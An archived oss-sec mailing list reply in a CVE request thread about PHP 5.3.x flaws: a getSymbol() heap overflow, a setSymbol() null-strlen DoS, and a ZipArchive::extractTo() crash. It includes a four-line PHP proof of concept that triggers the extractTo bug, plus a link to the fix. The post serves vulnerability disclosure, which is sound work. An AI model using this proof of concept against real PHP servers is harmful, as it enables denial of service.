oss-sec mailing list archives

Re: CVE request (PHP 5.3.x getSymbol() DoS; CERT VU#479900)

From: Maksymilian Arciemowicz <cxib () securityreason com>
Date: Tue, 7 Dec 2010 22:43:17 +0000 (UTC)

Tomas Hoger <thoger@...> writes:

Btw, setSymbol() is affected too, and does not seem to be addressed in
r305571.  In both cases, it's PHP exposing ICU bug.



setSymbol() give only DoS with strlen(NULL) [CWE-170].
getSymbol() Integer overflow which causes heap overflow.

see also ZipArchive:extractTo()
Possible CWE-170 strlen(NULL)

PoC:
<?php

$zip = new ZipArchive;
$zip->open('./dupa.zip');
var_dump($zip->extractTo('/tmp', array('', '')));


?>

Fix:
http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/ext/zip/php_zip.c?view=log

Current thread:

CVE request (PHP 5.3.x getSymbol() DoS; CERT VU#479900) Vincent Danen (Dec 06)
- Re: CVE request (PHP 5.3.x getSymbol() DoS; CERT VU#479900) Steven M. Christey (Dec 06)
  - Re: CVE request (PHP 5.3.x getSymbol() DoS; CERT VU#479900) Vincent Danen (Dec 06)
- Re: CVE request (PHP 5.3.x getSymbol() DoS; CERT VU#479900) Tomas Hoger (Dec 07)
  - Re: CVE request (PHP 5.3.x getSymbol() DoS; CERT VU#479900) Maksymilian Arciemowicz (Dec 07)
    - Re: Re: CVE request (PHP 5.3.x getSymbol() DoS; CERT VU#479900) Tomas Hoger (Dec 08)
    - Re: CVE request (PHP 5.3.x getSymbol() DoS; CERT VU#479900) Maksymilian Arciemowicz (Dec 08)
    - Re: Re: CVE request (PHP 5.3.x getSymbol() DoS; CERT VU#479900) Tomas Hoger (Dec 08)
- Re: CVE request (PHP 5.3.x getSymbol() DoS; CERT VU#479900) Pierre Joye (Dec 07)
  - Re: CVE request (PHP 5.3.x getSymbol() DoS; CERT VU#479900) Tomas Hoger (Dec 09)